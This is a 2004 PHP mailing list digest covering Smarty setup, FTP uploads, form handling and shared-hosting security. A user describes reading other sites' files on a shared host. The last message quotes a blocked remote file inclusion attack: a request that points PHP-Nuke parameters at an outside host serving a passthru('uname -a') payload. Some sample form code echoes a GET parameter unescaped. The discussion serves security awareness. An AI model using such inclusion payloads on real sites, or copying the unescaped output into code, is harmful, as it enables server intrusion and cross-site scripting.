php-general Digest 26 Sep 2004 11:43:40 -0000 Issue 3018
Topics (messages 197846 through 197868):
Re: Problems installing smarty on a shared host
197846 by: Curt Zirzow
197848 by: Pablo Gosse
Re: ftp_put Problems
197847 by: Marek Kilimajer
197849 by: raditha dissanayake
Re: is that possible with Objects in php 4 or php5 ?
197850 by: raditha dissanayake
Conceptual ?: using 'multi-purpose' form for validation
197851 by: Whil Hentzen
197866 by: Marek Kilimajer
php security on shared hosts
197852 by: Pablo Gosse
197853 by: Tim Traver
197858 by: Chris Shiflett
197859 by: Chris Shiflett
197861 by: raditha dissanayake
Server's IP Adress
197854 by: Kevin Javia
197855 by: Pahlevanzadeh Mohsen
Re: New PHP tutorial - suggestions welcome
197856 by: John Taylor-Johnston
197857 by: Jack Gates
OT - HTML Terminal ?
197860 by: Dave Restall - System Administrator,,,
197863 by: Marek Kilimajer
What's going on?
197862 by: Phpu
197867 by: Marek Kilimajer
Getting Header info with PHP?
197864 by: Nick Wilson
Instant messenger
197865 by: Phpu
Hacker IP and Script
197868 by: Jason Paschal
Administrivia:
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
[EMAIL PROTECTED]
----------------------------------------------------------------------
--- Begin Message ---
* Thus wrote Pablo Gosse:
> Hi folks. I've recently moved my site to a shared host, and this is the
> first time I've had to set up my site in a really restrictive
> environment, and I'm running into problems getting smarty installed.
>
> Using the basic example set up from the Smarty docs, when I run the file
> I get the following error:
>
> Warning: main(Smarty.class.php): failed to open stream: No such file or
> directory in /home/virtual/site357/fst/var/www/html/smarty.php on line 4
>
> Fatal error: main(): Failed opening required 'Smarty.class.php'
> (include_path='.:/php/includes:/usr/share/php:/home/pablogosse/smarty/')
> in /home/virtual/site357/fst/var/www/html/smarty.php on line 4
>
> Now, as you can see by the value of my include path, I've got the path
> to smarty added, but it's still not finding the file even though
> /home/pablogosse/smarty/Smarty.class.php does indeed exist.
You'll probably notice that the permissions for /home/pablogosse
are like: drwxr-x--- with user:group pablogosse:pablogosse
If you have permissions to, i would set up a directory like:
/home/virtual/site357/fst/var/include/smarty/
And then set the include_path appropriatly.
Curt
--
The above comments may offend you. flame at will.
--- End Message ---
--- Begin Message ---
[snip]
You'll probably notice that the permissions for /home/pablogosse
are like: drwxr-x--- with user:group pablogosse:pablogosse
If you have permissions to, i would set up a directory like:
/home/virtual/site357/fst/var/include/smarty/
And then set the include_path appropriatly.
[/snip]
Unfortunately I don't have write access to /var as it is owned by root.
I've just discovered another thing which makes me even more nervous.
I just wrote a script as a quick test and I was able to use
file_get_contents to read a file out of another user's webroot. So,
anyone who is storing passwords or other valuable information under
their webroot risks having that information being easily accessible to
anyone else hosting here.
As I said earlier, most of my experience until now has been in
situations where the sites I've worked on have been hosted on dedicated
servers, and this has never been a problem.
Is this a common set up for shared hosting? Is there any way around
this?
Cheers and TIA,
Pablo
--- End Message ---
--- Begin Message ---
Julian wrote:
well, i suspect i am at a dead end. here is the layout of things.
we want to put up an internet kiosk at certain thoroughbred auctions to
allow people to send ecards as well as contact associates. we have a web cam
on the kiosk and a partner came up with the idea of letting them send photos
of themselves as well. the problem is i cannot find a way to use the form
type FILE without giving the user access to everything on the kiosk
computer. try as i might i cannot get around that "browse" button. so i
thought i would try the ftp functions which i am totally unfamiliar with. i
do truly appreciate the time you and others took to look into this.
You can setup a apache and php on the kiosk machine. Document root will
be the folder where the webcam stores images, or just one directory up.
You can create a simple php script that will let them browse the
pictures (only the pictures :)), or not so simple that will allow them
to make some adjustments to the pictures using image functions. When
everything is ready, with a press of a button then can mail the ecards.
What would be done on the server will do the kiosk.
--- End Message ---
--- Begin Message ---
Julian wrote:
i am trying to get a file from my local c drive to my server using something
other than a form.
This is pretty much an impossible task for server side scripting. You
can perhaps use an applet to upload either via FTP or HTTP.
but marek's last mail is probably the best solution.
--
Raditha Dissanayake.
------------------------------------------------------------------------
http://www.radinks.com/sftp/ | http://www.raditha.com/megaupload
Lean and mean Secure FTP applet with | Mega Upload - PHP file uploader
Graphical User Inteface. Just 128 KB | with progress bar.
--- End Message ---
--- Begin Message ---
Alawi Albaity wrote:
I have object A and object B that extended from object A and have it
Own abilities
and object C that extended from object A and have it Own abilities
I want to use the abilities of object B on object C and abilities of
object C on object B , but the problem that what found out is that I
must merge this classes with the original class together so I can do
all abilities .
this is not work out with me if I have to merge big class , so is
there any possibility to do that so I can win the abilities of this
two classes together without merge ?
Shor answer no:
long answer: you can use an interface to describe the behaviour of class
B and implement that interface in class C so that class C can be made to
behave like class B does.
Having said all that if you want class B to behave like class C there is
a problem in the design and any time spent now in rectifying the issue
(possibly by mering the two classes) will definitely save you countless
hours of hair pulling in the future.
--
Raditha Dissanayake.
------------------------------------------------------------------------
http://www.radinks.com/sftp/ | http://www.raditha.com/megaupload
Lean and mean Secure FTP applet with | Mega Upload - PHP file uploader
Graphical User Inteface. Just 128 KB | with progress bar.
--- End Message ---
--- Begin Message ---
I can get a single form to call itself again if there's nothing fancy going
on. This code will prompt the user for their mail if it doesn't already
exist, and if the email does exist, provides some data out of database.
<?php if ( !isset($_POST['email']) ): ?>
<!-- No email, so prompt the user for one.-->
<form action="<?=$_SERVER['PHP_SELF']?>" method="post">
Login: <input type="text" name="email" />
<input type="submit" value="GO" />
</form>
<?php else: ?>
<p>Data for email: <?=$_GET['email']?></p>
// do some database stuff and display the results
<?php endif; ?>
I'd like to validate the email that was entered against a database - if the
email address is found, continue on with the ELSE code. If not found, though,
run the IF section again.
Conceptually I'm missing how to do that. I've done it in two pages, where the
form action calls a second PHP page, and the code in that second page looks
for the address and displays one result or another depending on if it's
found.
How do I do this in one page, if it's appropriate and practical (i.e. good
coding) to do so?
Thanks,
Whil
--- End Message ---
--- Begin Message ---
Whil Hentzen wrote:
I can get a single form to call itself again if there's nothing fancy going
on. This code will prompt the user for their mail if it doesn't already
exist, and if the email does exist, provides some data out of database.
<?php
$email = (isset($_POST['email']) ? $_POST['email'] : '');
if ( !validate_email($email) ): ?>
<!-- No email, so prompt the user for one.-->
<form action="<?=$_SERVER['PHP_SELF']?>" method="post">
Login: <input type="text" name="email" />
<input type="submit" value="GO" />
</form>
<?php else: ?>
<p>Data for email: <?=$_GET['email']?></p>
// do some database stuff and display the results
<?php endif; ?>
I'd like to validate the email that was entered against a database - if the
email address is found, continue on with the ELSE code. If not found, though,
run the IF section again.
Conceptually I'm missing how to do that. I've done it in two pages, where the
form action calls a second PHP page, and the code in that second page looks
for the address and displays one result or another depending on if it's
found.
How do I do this in one page, if it's appropriate and practical (i.e. good
coding) to do so?
Thanks,
Whil
--- End Message ---
--- Begin Message ---
Hi folks. I recently set up hosting for my site and have noticed
something which is making me nervous.
I can't seem to include files outside of my webroot, so I wrote a script
to test permissions using passthru to output the results of a bunch of
ls -la commands to see what I did and did not have access to. Eventually
I was able to read the directory which holds the root folders for all
sites on the server, and from there I was able to read files (revealing
the php source) from the webroot of another site.
This to me is a huge security issue since if anyone has any sensitive
information there, it could easily be accessed by anyone else hosting on
the same server. And because I can't seem to include files from outside
my webroot, if I stay with this company I'll be forced to include
information such as database passwords inside my webroot, therefore
exposing the information to every other user on the server, and that's
just not acceptable.
All of my experience until now has been in situations where the sites
I've worked on have been hosted on dedicated servers, so this has never
been a problem.
Is this a common set up for shared hosting? Is there any way around
this?
Cheers and TIA.
Pablo
--- End Message ---
--- Begin Message ---
Pablo,
As a shared hosting company myself (http://www.simplenet.com/), I can
guarantee that is not the way it is supposed to be. We make sure that can't
happen by running in Safe mode, using the open_basedir directive, and
making sure the directory tree has the correct permissions so the situation
you described cannot happen.
So, I'd say that your shared host is doing a poor job of implementing PHP.
Tim.
At 08:31 PM 9/25/2004, Pablo Gosse wrote:
Hi folks. I recently set up hosting for my site and have noticed
something which is making me nervous.
I can't seem to include files outside of my webroot, so I wrote a script
to test permissions using passthru to output the results of a bunch of
ls -la commands to see what I did and did not have access to. Eventually
I was able to read the directory which holds the root folders for all
sites on the server, and from there I was able to read files (revealing
the php source) from the webroot of another site.
This to me is a huge security issue since if anyone has any sensitive
information there, it could easily be accessed by anyone else hosting on
the same server. And because I can't seem to include files from outside
my webroot, if I stay with this company I'll be forced to include
information such as database passwords inside my webroot, therefore
exposing the information to every other user on the server, and that's
just not acceptable.
All of my experience until now has been in situations where the sites
I've worked on have been hosted on dedicated servers, so this has never
been a problem.
Is this a common set up for shared hosting? Is there any way around
this?
Cheers and TIA.
Pablo
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
SimpleNet's Back !
http://www.simplenet.com
--- End Message ---
--- Begin Message ---
--- Pablo Gosse <[EMAIL PROTECTED]> wrote:
> Hi folks. I recently set up hosting for my site and have noticed
> something which is making me nervous.
>
> I can't seem to include files outside of my webroot, so I wrote
> a script to test permissions using passthru to output the results
> of a bunch of ls -la commands to see what I did and did not have
> access to. Eventually I was able to read the directory which
> holds the root folders for all sites on the server, and from
> there I was able to read files (revealing the php source) from
> the webroot of another site.
>
> This to me is a huge security issue since if anyone has any
> sensitive information there, it could easily be accessed by
> anyone else hosting on the same server. And because I can't seem
> to include files from outside my webroot, if I stay with this
> company I'll be forced to include information such as database
> passwords inside my webroot, therefore exposing the information
> to every other user on the server, and that's just not acceptable.
I just published a free article on my Web site about shared hosting:
http://shiflett.org/articles/security-corner-mar2004
In short, what you've found is typical for most shared hosts, and
safe_mode (a directive created to help mitigate this problem a bit) does
little to help. However, there are some things you can do as a developer,
and I give some specific examples.
Hope that helps.
Chris
=====
Chris Shiflett - http://shiflett.org/
PHP Security - O'Reilly
Coming December 2004
HTTP Developer's Handbook - Sams
http://httphandbook.org/
PHP Community Site
http://phpcommunity.org/
--- End Message ---
--- Begin Message ---
--- Tim Traver <[EMAIL PROTECTED]> wrote:
> I can guarantee that is not the way it is supposed to be. We
> make sure that can't happen by running in Safe mode, using the
> open_basedir directive, and making sure the directory tree has
> the correct permissions so the situation you described cannot
> happen.
The safe_mode and open_basedir directives are certainly no protection. I'm
curious what sort of permissions you are using that prevents this
scenario, since it seems impossible to me. If the legitimate developer can
include code using include or require, it means the Web server must be
able to read those files. The exception would be if you're running each
user in a chroot jail or something, mimicking a dedicated environment.
> So, I'd say that your shared host is doing a poor job of
> implementing PHP.
I used to think the same, but I've changed my mind, because:
1. safe_mode is no protection.
2. Many prepackaged PHP applications don't work with safe_mode enabled.
Hope that helps.
Chris
=====
Chris Shiflett - http://shiflett.org/
PHP Security - O'Reilly
Coming December 2004
HTTP Developer's Handbook - Sams
http://httphandbook.org/
PHP Community Site
http://phpcommunity.org/
--- End Message ---
--- Begin Message ---
Pablo Gosse wrote:
Hi folks. I recently set up hosting for my site and have noticed
something which is making me nervous.
If you are really nervous you cannot use shared hosting. Simple as that.
Even if other users don't access your stuff, the root user can. While
it's against the system administrators code of conduct to look into
other user's files, you cannot rule out the possibility of someone
taking a peek.
As chris has pointed out safe mode is no protection. On some servers
(not all) you can try changing your home directory permissions to remove
others' read and others' execute to get an additional measure of protection.
--
Raditha Dissanayake.
------------------------------------------------------------------------
http://www.radinks.com/sftp/ | http://www.raditha.com/megaupload
Lean and mean Secure FTP applet with | Mega Upload - PHP file uploader
Graphical User Inteface. Just 128 KB | with progress bar.
--- End Message ---
--- Begin Message ---
Greetings,
How can I get Server's IP address?
I know $_SERVER["SERVER_ADDRSS"] but this do not work all the time. Is there
any other method?
Thanks a ton in advance.
Kevin.
--- End Message ---
--- Begin Message ---
You can use getbyhostname() func.
--- Kevin Javia <[EMAIL PROTECTED]> wrote:
> Greetings,
>
> How can I get Server's IP address?
>
> I know $_SERVER["SERVER_ADDRSS"] but this do not
> work all the time. Is there
> any other method?
>
> Thanks a ton in advance.
>
> Kevin.
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
=====
---------DIGITAL SIGNATURE-------------------
///Mohsen Pahlevanzadeh////////
Network administrator & programmer
My home phone is: +98213810146
My email address is
m_pahlevanzadeh at yahoo dot com
My website is: http://webnegar.net
----------------------------------------------------------------
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!
http://promotions.yahoo.com/new_mail
--- End Message ---
--- Begin Message ---
Consistently crashes my Netscape 4.8 (circa 2003). yeah, I still use it, because I
prefer its news reader. Very few attacks on this mature mail program. That said,
you're forcing me to use IE6 :-|
--- End Message ---
--- Begin Message ---
On Sunday 26 September 2004 12:32 am, John Taylor-Johnston wrote:
> Consistently crashes my Netscape 4.8 (circa 2003). yeah, I still use it,
> because I prefer its news reader. Very few attacks on this mature mail
> program. That said, you're forcing me to use IE6 :-|
No one is forcing you to use anything. You made your own choice to use an
older browser.
His site works great with Mozilla 1.4 on Linux an Mozilla 1.7.1 on Windows
--
Jack "The Rhino" Gates, Registered Linux user #342662
Morning Star Communications, www.morningstarcom.net
Web Hosting, Site Design, Domain Registration,
VMware Workstation Software and GSX Server Software
--- End Message ---
--- Begin Message ---
Hi,
this is severely off topic so please feel free to ignore it :-)
I have an intranet application that currently is accessed using a
browser, no problems there, however I have been asked if I can get rid
of the browser so that the user's are not encouraged to surf so readily.
I initially thought simple - start the browser with the correct home page
as a command line argument and turn off all the tool bars etc. so that it
looks like an xterm (dos window) and of course they can only then click
on the links we provide. It's not meant to be foolproof and a dedicated
hacker could circumvent the system, however most users won't bother.
I don't particularly want to go the F11 (full screen) route and would
like something easy to install if possible, e.g. a single .exe, Lynx
seemed a good point to start but I think that would freak out just about
all the end users :-)
Does anybody have any POLITE suggestions or any experience of something
similar and can let me in on the secret ?
I have tried google, mozilla & m$ the nearest I have come so far is IEAK.
TTFN,
Dave
php/2004-09-26.tx php-general
+----------------------------------------------------------------------------+
| Dave Restall, IIRC Limited, PO Box 46, Skelton, Cleveland, TS12 2GT. |
| Tel. 0845 10 80 151 Mob. +44 (0) 7973 831245 Int. +44 (0) 1287 653003 |
| email : [EMAIL PROTECTED] [EMAIL PROTECTED] Web : http://www.iirc.net |
+----------------------------------------------------------------------------+
| I have learned To spell hors d'oeuvres Which still grates on Some |
| people's n'oeuvres. |
| -- Warren Knox |
+----------------------------------------------------------------------------+
--- End Message ---
--- Begin Message ---
Dave Restall - System Administrator,,, wrote:
Hi,
this is severely off topic so please feel free to ignore it :-)
I have an intranet application that currently is accessed using a
browser, no problems there, however I have been asked if I can get rid
of the browser so that the user's are not encouraged to surf so readily.
I initially thought simple - start the browser with the correct home page
as a command line argument and turn off all the tool bars etc. so that it
looks like an xterm (dos window) and of course they can only then click
on the links we provide. It's not meant to be foolproof and a dedicated
hacker could circumvent the system, however most users won't bother.
I don't particularly want to go the F11 (full screen) route and would
like something easy to install if possible, e.g. a single .exe, Lynx
seemed a good point to start but I think that would freak out just about
all the end users :-)
Does anybody have any POLITE suggestions or any experience of something
similar and can let me in on the secret ?
I have tried google, mozilla & m$ the nearest I have come so far is IEAK.
You can rewrite the interface in XUL for mozilla:
http://www.xulplanet.com/
--- End Message ---
--- Begin Message ---
For the last 2 days i haven't received emails. What's going on with this mailing list?
--- End Message ---
--- Begin Message ---
Phpu wrote:
For the last 2 days i haven't received emails. What's going on with this mailing list?
It might have something to do with the fact your clock is 2 days behind.
Have you been time travelling?
--- End Message ---
--- Begin Message ---
Hi everyone,
Can anyone tell me which functions/areas i need to look at to do the
following?
* I need to check a proxy server.
* I want to have the proxy fetch a php page at my site
* my php page should show me *every* header the proxy server sends
Is that possible?
much thanks, and have a nice sunday morning ;-)
--
Nick W
--- End Message ---
--- Begin Message ---
Hi,
I wanna create an instant private messenger. This kind of IM i have seen on dating
sites.
I've googled for such IM but i found nothing.
Can someone please help me with this?
Thank you
--- End Message ---
--- Begin Message ---
This is of questionable relevance, but I'm sure it can serve to
heighten awareness of vulnerabilities for those PHP'ers with similar
scripts that involve loading files based upon query string info.
We have installed Admin Secure over our PHP-Nuke CMS, and Admin Secure
recently sent us an email of a thwarted hacking attempt:
--------------------------------------------------------
Admin Secure detecting invalid file inclusion passed to index.php or
modules.php files. This could be possible cross-site scripting (XSS)
hack attempt to your site. For security reason, this attempt has been
blocked by Admin Secure to protect your website. Admin Secure has been
collecting the following information:
- Date: 26 September 2004, 01:05
- IP Address: 193.150.170.160
- User-agent: curl/7.9.5 (i586-pc-linux-gnu) libcurl 7.9.5 (ipv6 enabled)
- Request:
/modules.php?name=http://193.150.170.160/4do4sjr?&sa=http://193.150.170.160/4do4sjr?&year=http://193.150.170.160/4do4sjr?&month=http://193.150.170.160/4do4sjr?&month_l=http://193.150.170.160/4do4sjr?
- Variable: $name = http://193.150.170.160/4do4sjr?
Whois Information.....
-------------------------------------------------------
The link he was trying to get our scripts to load,
http://193.150.170.160/4do4sjr? , displays this:
<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>
Which would, from what I've read about the uname command, give him
info about our web server, and from there he would have an idea of
which vulnerabilities to exploit.
----------------------------------------------------
What would you guys do with the attack information (IP, WHOIS)? Send
a detailed email to the addresses listed in the WHOIS records? I'm
not sweating it, just curious.
Thank you,
~Jason
--- End Message ---
